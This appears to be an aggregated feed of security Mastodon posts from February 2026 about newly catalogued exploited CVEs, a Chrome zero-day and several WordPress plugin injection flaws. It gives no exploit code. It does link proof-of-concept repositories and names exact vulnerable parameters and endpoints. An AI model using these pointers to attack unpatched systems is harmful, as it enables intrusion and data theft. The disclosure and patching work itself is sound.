- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2020-7796 (secdb.nttzen.cloud/cve/detail/)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2024-7694 (secdb.nttzen.cloud/cve/detail/)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-2441 (secdb.nttzen.cloud/cve/detail/)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2

##

cisakevtracker@mastodon.social at 2026-02-17T21:01:14.000Z ##

CVE ID: CVE-2024-7694
Vendor: TeamT5
Product: ThreatSonar Anti-Ransomware
Date Added: 2026-02-17
Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

AAKL@infosec.exchange at 2026-02-18T15:59:56.000Z ##

CISA added four known vulnerabilities to the KEV catalogue yesterday, if you missed them.

- CVE-2008-0015: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability cve.org/CVERecord?id=CVE-2008-

- CVE-2020-7796: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability cve.org/CVERecord?id=CVE-2020-

- CVE-2024-7694: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2026-2441 Google Chromium CSS Use-After-Free Vulnerability cve.org/CVERecord?id=CVE-2026- #CISA #vulnerability #Google #Microsoft #Zimbra #Windows

##

secdb@infosec.exchange at 2026-02-17T22:00:17.000Z ##

🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2008-0015 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2020-7796 (secdb.nttzen.cloud/cve/detail/)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2024-7694 (secdb.nttzen.cloud/cve/detail/)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-2441 (secdb.nttzen.cloud/cve/detail/)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441

##

cisakevtracker@mastodon.social at 2026-02-17T21:01:14.000Z ##

CVE ID: CVE-2024-7694
Vendor: TeamT5
Product: ThreatSonar Anti-Ransomware
Date Added: 2026-02-17
Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2026-2441
(8.8 HIGH)

EPSS: 0.63%

updated 2026-02-18T13:46:40.307000

25 posts

Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

3 repos

https://github.com/huseyinstif/CVE-2026-2441-PoC

https://github.com/b1gchoi/CVE-2026-2441_POC

https://github.com/jermaine22sei/CVE-2026-2441

newsyc250@toot.community at 2026-02-19T02:03:27.000Z ##

Zero-day CSS: CVE-2026-2441 exists in the wild: chromereleases.googleblog.com/

Discussion: news.ycombinator.com/item?id=4

##

hn250@social.lansky.name at 2026-02-19T01:55:12.000Z ##

Zero-day CSS: CVE-2026-2441 exists in the wild

Link: chromereleases.googleblog.com/
Discussion: news.ycombinator.com/item?id=4

##

newsyc200@toot.community at 2026-02-18T22:13:25.000Z ##

Zero-day CSS: CVE-2026-2441 exists in the wild: chromereleases.googleblog.com/

Discussion: news.ycombinator.com/item?id=4

##

hackernewsdaily@bsd.cafe at 2026-02-18T20:00:08.000Z ##

📰 Today's Top 21 Hacker News Stories (Sorted by Score) 📰
----------------------------------------
🔖 Title: If you’re an LLM, please read this
🔗 URL: annas-archive.li/blog/llms-txt
👍 Score: [621]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Terminals should generate the 256-color palette
🔗 URL: gist.github.com/jake-stewart/0
👍 Score: [408]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Tailscale Peer Relays is now generally available
🔗 URL: tailscale.com/blog/peer-relays
👍 Score: [197]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Zero-day CSS: CVE-2026-2441 exists in the wild
🔗 URL: chromereleases.googleblog.com/
👍 Score: [156]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Garment Notation Language: Formal descriptive language for clothing construction
🔗 URL: github.com/khalildh/garment-no
👍 Score: [101]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Arizona Bill Requires Age Verification for All Apps
🔗 URL: reclaimthenet.org/arizona-bill
👍 Score: [96]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Cosmologically Unique IDs
🔗 URL: jasonfantl.com/posts/Universal
👍 Score: [89]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Pocketbase lost its funding from FLOSS fund
🔗 URL: github.com/pocketbase/pocketba
👍 Score: [65]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: DNS-Persist-01: A New Model for DNS-Based Challenge Validation
🔗 URL: letsencrypt.org/2026/02/18/dns
👍 Score: [57]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Show HN: VectorNest responsive web-based SVG editor
🔗 URL: ekrsulov.github.io/vectornest/
👍 Score: [50]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Show HN: CEL by Example
🔗 URL: celbyexample.com/
👍 Score: [50]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Show HN: Echo, an iOS SSH+mosh client built on Ghostty
🔗 URL: replay.software/updates/introd
👍 Score: [46]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Show HN: Formally verified FPGA watchdog for AM broadcast in unmanned tunnels
🔗 URL: github.com/Park07/amradio
👍 Score: [40]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Cistercian Numbers
🔗 URL: omniglot.com/language/numbers/
👍 Score: [34]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Learning Lean: Part 1
🔗 URL: rkirov.github.io/posts/lean1/
👍 Score: [31]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Show HN: Trust Protocols for Anthropic/OpenAI/Gemini
🔗 URL: mnemom.ai
👍 Score: [23]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: 99% of adults over 40 have shoulder "abnormalities" on an MRI, study finds
🔗 URL: arstechnica.com/health/2026/02
👍 Score: [20]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: The true history of the Minotaur: what archaeology reveals
🔗 URL: nationalgeographic.fr/histoire
👍 Score: [19]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: SkyRL brings Tinker to your GPUs (2025)
🔗 URL: novasky-ai.notion.site/skyrl-t
👍 Score: [12]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: OpenClaw Is Dangerous
🔗 URL: 12gramsofcarbon.com/p/tech-thi
👍 Score: [11]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------
🔖 Title: Discrete Structures [pdf]
🔗 URL: kyleormsby.github.io/files/113
👍 Score: [8]
💬 Discussion: news.ycombinator.com/item?id=4
----------------------------------------

##

hn100@social.lansky.name at 2026-02-18T17:55:10.000Z ##

Zero-day CSS: CVE-2026-2441 exists in the wild

Link: chromereleases.googleblog.com/
Discussion: news.ycombinator.com/item?id=4

##

hn50@social.lansky.name at 2026-02-18T17:15:07.000Z ##

Zero-day CSS: CVE-2026-2441 exists in the wild

Link: chromereleases.googleblog.com/
Discussion: news.ycombinator.com/item?id=4

##

newsycombinator@framapiaf.org at 2026-02-18T17:00:13.000Z ##

Zero-day CSS: CVE-2026-2441 exists in the wild
Link: chromereleases.googleblog.com/
Comments: news.ycombinator.com/item?id=4

##

hnbot@chrispelli.fun at 2026-02-18T16:34:05.000Z ##

Zero-day CSS: CVE-2026-2441 exists in the wild - chromereleases.googleblog.com/

#hackernews

##

h4ckernews@mastodon.social at 2026-02-18T16:32:24.000Z ##

Zero-day CSS: CVE-2026-2441 exists in the wild

chromereleases.googleblog.com/

#HackerNews

##

SerferTroyan@mastodon.social at 2026-02-18T16:24:14.000Z ##

📰 Google терміново оновила Chrome через zero-day, яку вже експлуатують в атаках

У Chrome виявили zero-day CVE-2026-2441 із ризиком виконання довільного коду — користувачам радять негайно оновитися.

🔗 proit.ua/google-tierminovo-ono

##

AAKL at 2026-02-18T15:59:56.551Z ##

CISA added four known vulnerabilities to the KEV catalogue yesterday, if you missed them.

- CVE-2008-0015: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability cve.org/CVERecord?id=CVE-2008-

- CVE-2020-7796: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability cve.org/CVERecord?id=CVE-2020-

- CVE-2024-7694: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2026-2441 Google Chromium CSS Use-After-Free Vulnerability cve.org/CVERecord?id=CVE-2026-

##

cktodon@mas.to at 2026-02-18T14:00:05.000Z ##

#Google corrige un zero-day de #Chrome (CVE-2026-2441) ya explotado en #ataques

unaaldia.hispasec.com/2026/02/

##

PC_Fluesterer@social.tchncs.de at 2026-02-18T08:21:04.000Z ##

Notfall-Update Google Chrome

Wir haben schon Mitte Februar, da wird es höchste Zeit, dass die erste Zero-Day Hintertür in Chrome entdeckt wird. Im vorigen Jahr hat Google es auf deren acht* (!) gebracht. Die Lücke CVE-2026-2441 wurde entdeckt, weil sie bereits aktiv für Angriffe ausgenutzt wird. Google hat Notfall-Updates für Chrome veröffentlicht. Meldungen gibt es beispielsweise hier oder hier. Ob Chromium und die diversen Ableger auch betroffen sind, ist noch nicht bekannt. Bei Chromium ist es ziemlich wahrscheinlich. Dabei ist mein Chromium unter Linux bereits auf Version 145.0.7632.45, also schon höher als die von Google angegebene

pc-fluesterer.info/wordpress/2

#Empfehlung #Hintergrund #Warnung #Website #0day #chrome #cybercrime #exploits #google #UnplugGoogle #UnplugTrump #hintertür

##

secdb at 2026-02-17T22:00:17.716Z ##

🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2008-0015 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2020-7796 (secdb.nttzen.cloud/cve/detail/)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2024-7694 (secdb.nttzen.cloud/cve/detail/)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-2441 (secdb.nttzen.cloud/cve/detail/)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2

##

cisakevtracker@mastodon.social at 2026-02-17T21:01:45.000Z ##

CVE ID: CVE-2026-2441
Vendor: Google
Product: Chromium
Date Added: 2026-02-17
Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

hn250@social.lansky.name at 2026-02-19T01:55:12.000Z ##

Zero-day CSS: CVE-2026-2441 exists in the wild

Link: chromereleases.googleblog.com/
Discussion: news.ycombinator.com/item?id=4

##

hn100@social.lansky.name at 2026-02-18T17:55:10.000Z ##

Zero-day CSS: CVE-2026-2441 exists in the wild

Link: chromereleases.googleblog.com/
Discussion: news.ycombinator.com/item?id=4

##

hn50@social.lansky.name at 2026-02-18T17:15:07.000Z ##

Zero-day CSS: CVE-2026-2441 exists in the wild

Link: chromereleases.googleblog.com/
Discussion: news.ycombinator.com/item?id=4

##

newsycombinator@framapiaf.org at 2026-02-18T17:00:13.000Z ##

Zero-day CSS: CVE-2026-2441 exists in the wild
Link: chromereleases.googleblog.com/
Comments: news.ycombinator.com/item?id=4

##

h4ckernews@mastodon.social at 2026-02-18T16:32:24.000Z ##

Zero-day CSS: CVE-2026-2441 exists in the wild

chromereleases.googleblog.com/

#HackerNews

##

AAKL@infosec.exchange at 2026-02-18T15:59:56.000Z ##

CISA added four known vulnerabilities to the KEV catalogue yesterday, if you missed them.

- CVE-2008-0015: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability cve.org/CVERecord?id=CVE-2008-

- CVE-2020-7796: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability cve.org/CVERecord?id=CVE-2020-

- CVE-2024-7694: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2026-2441 Google Chromium CSS Use-After-Free Vulnerability cve.org/CVERecord?id=CVE-2026- #CISA #vulnerability #Google #Microsoft #Zimbra #Windows

##

secdb@infosec.exchange at 2026-02-17T22:00:17.000Z ##

🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (secdb.nttzen.cloud/security-ad)

CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.

⚠️ CVE-2008-0015 (secdb.nttzen.cloud/cve/detail/)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: web.archive.org/web/2011030521 ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2020-7796 (secdb.nttzen.cloud/cve/detail/)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: wiki.zimbra.com/wiki/Zimbra_Re ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2024-7694 (secdb.nttzen.cloud/cve/detail/)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: teamt5.org/en/posts/vulnerabil ; twcert.org.tw/en/cp-139-8000-e ; nvd.nist.gov/vuln/detail/CVE-2

⚠️ CVE-2026-2441 (secdb.nttzen.cloud/cve/detail/)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2

#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441

##

cisakevtracker@mastodon.social at 2026-02-17T21:01:45.000Z ##

CVE ID: CVE-2026-2441
Vendor: Google
Product: Chromium
Date Added: 2026-02-17
Notes: chromereleases.googleblog.com/ ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

youranonnewsirc@nerdculture.de at 2026-02-17T09:50:12.000Z ##

Geopolitical: US-Iran nuclear talks resumed in Geneva (Feb 16). The Pentagon is also reviewing ties with Anthropic over AI usage safeguards (Feb 16). Tech: Majorana qubits were decoded, marking a breakthrough for robust quantum computing (Feb 16). Cybersecurity: Google patched an actively exploited Chrome zero-day (CVE-2026-2441), and Japan's Washington Hotel disclosed a ransomware attack from Feb 13.

#AnonNews_irc #Cybersecurity #News

##

youranonnewsirc@nerdculture.de at 2026-02-17T03:50:08.000Z ##

Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.

#Cybersecurity #AI #Geopolitics

##

CVE-2026-2495
(7.5 HIGH)

EPSS: 0.08%

updated 2026-02-18T09:32:07

4 posts

The WPNakama – Team and multi-Client Collaboration, Editorial and Project Management plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the '/wp-json/WPNakama/v1/boards' REST API endpoint in all versions up to, and including, 0.6.5. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This ma

offseq at 2026-02-18T10:30:29.678Z ##

⚠️ CVE-2026-2495: HIGH severity SQL Injection in WPNakama WordPress plugin (≤0.6.5) via REST API 'order' param. Unauthenticated attackers may access sensitive DB data. Patch or mitigate immediately! radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-18T09:16:44.000Z ##

🟠 CVE-2026-2495 - High (7.5)

The WPNakama – Team and multi-Client Collaboration, Editorial and Project Management plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the '/wp-json/WPNakama/v1/boards' REST API endpoint in all versions up to, and ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-18T10:30:29.000Z ##

⚠️ CVE-2026-2495: HIGH severity SQL Injection in WPNakama WordPress plugin (≤0.6.5) via REST API 'order' param. Unauthenticated attackers may access sensitive DB data. Patch or mitigate immediately! radar.offseq.com/threat/cve-20 #OffSeq #WordPress #SQLInjection #CVE20262495

##

thehackerwire@mastodon.social at 2026-02-18T09:16:44.000Z ##

🟠 CVE-2026-2495 - High (7.5)

The WPNakama – Team and multi-Client Collaboration, Editorial and Project Management plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the '/wp-json/WPNakama/v1/boards' REST API endpoint in all versions up to, and ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1714
(8.6 HIGH)

EPSS: 0.06%

updated 2026-02-18T06:30:25

2 posts

The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +21 Modules – All in One Solution plugin for WordPress is vulnerable to Email Relay Abuse in all versions up to, and including, 3.3.2. This is due to the lack of validation on the 'send_to', 'product_title', 'wlmessage', and 'wlemail' parameters in the 'woolentor_suggest_price_action' AJAX endpoint. This makes it possible for unauthent

thehackerwire@mastodon.social at 2026-02-18T05:20:24.000Z ##

🟠 CVE-2026-1714 - High (8.6)

The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +21 Modules – All in One Solution plugin for WordPress is vulnerable to Email Relay Abuse in all versions up to, and including, 3.3.2. This is due to the lack of validation on the ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T05:20:24.000Z ##

🟠 CVE-2026-1714 - High (8.6)

The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +21 Modules – All in One Solution plugin for WordPress is vulnerable to Email Relay Abuse in all versions up to, and including, 3.3.2. This is due to the lack of validation on the ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2576
(7.5 HIGH)

EPSS: 0.07%

updated 2026-02-18T06:30:25

2 posts

The Business Directory Plugin – Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'payment' parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additiona

thehackerwire@mastodon.social at 2026-02-18T05:20:15.000Z ##

🟠 CVE-2026-2576 - High (7.5)

The Business Directory Plugin – Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'payment' parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the use...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T05:20:15.000Z ##

🟠 CVE-2026-2576 - High (7.5)

The Business Directory Plugin – Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'payment' parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the use...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-13689
(8.8 HIGH)

EPSS: 0.03%

updated 2026-02-18T00:30:22

2 posts

IBM DataStage on Cloud Pak for Data could allow an authenticated user to execute arbitrary commands and gain access to sensitive information due to unrestricted file uploads.

thehackerwire@mastodon.social at 2026-02-17T23:19:33.000Z ##

🟠 CVE-2025-13689 - High (8.8)

IBM DataStage on Cloud Pak for Data could allow an authenticated user to execute arbitrary commands and gain access to sensitive information due to unrestricted file uploads.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T23:19:33.000Z ##

🟠 CVE-2025-13689 - High (8.8)

IBM DataStage on Cloud Pak for Data could allow an authenticated user to execute arbitrary commands and gain access to sensitive information due to unrestricted file uploads.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2627
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-18T00:30:22

2 posts

A security flaw has been discovered in Softland FBackup up to 9.9. This impacts an unknown function in the library C:\Program Files\Common Files\microsoft shared\ink\HID.dll of the component Backup/Restore. The manipulation results in link following. The attack needs to be approached locally. The exploit has been released to the public and may be used for attacks. The vendor was contacted early ab

thehackerwire@mastodon.social at 2026-02-17T22:19:48.000Z ##

🟠 CVE-2026-2627 - High (7.8)

A security flaw has been discovered in Softland FBackup up to 9.9. This impacts an unknown function in the library C:\Program Files\Common Files\microsoft shared\ink\HID.dll of the component Backup/Restore. The manipulation results in link followi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T22:19:48.000Z ##

🟠 CVE-2026-2627 - High (7.8)

A security flaw has been discovered in Softland FBackup up to 9.9. This impacts an unknown function in the library C:\Program Files\Common Files\microsoft shared\ink\HID.dll of the component Backup/Restore. The manipulation results in link followi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23647
(9.8 CRITICAL)

EPSS: 0.26%

updated 2026-02-17T21:32:21

4 posts

Glory RBG-100 recycler systems using the ISPK-08 software component contain hard-coded operating system credentials that allow remote authentication to the underlying Linux system. Multiple local user accounts, including accounts with administrative privileges, were found to have fixed, embedded passwords. An attacker with network access to exposed services such as SSH may authenticate using these

offseq at 2026-02-18T09:00:34.580Z ##

🚨 CVE-2026-23647 (CRITICAL, CVSS 9.3): Hard-coded OS credentials in Glory RBG-100 cash recyclers enable remote admin access via SSH. No patch yet — segment networks & restrict access! Financial orgs in Europe especially at risk. radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-17T20:23:42.000Z ##

🔴 CVE-2026-23647 - Critical (9.8)

Glory RBG-100 recycler systems using the ISPK-08 software component contain hard-coded operating system credentials that allow remote authentication to the underlying Linux system. Multiple local user accounts, including accounts with administrati...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-18T09:00:34.000Z ##

🚨 CVE-2026-23647 (CRITICAL, CVSS 9.3): Hard-coded OS credentials in Glory RBG-100 cash recyclers enable remote admin access via SSH. No patch yet — segment networks & restrict access! Financial orgs in Europe especially at risk. radar.offseq.com/threat/cve-20 #OffSeq #vuln #security

##

thehackerwire@mastodon.social at 2026-02-17T20:23:42.000Z ##

🔴 CVE-2026-23647 - Critical (9.8)

Glory RBG-100 recycler systems using the ISPK-08 software component contain hard-coded operating system credentials that allow remote authentication to the underlying Linux system. Multiple local user accounts, including accounts with administrati...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22208
(9.7 CRITICAL)

EPSS: 0.17%

updated 2026-02-17T21:32:21

4 posts

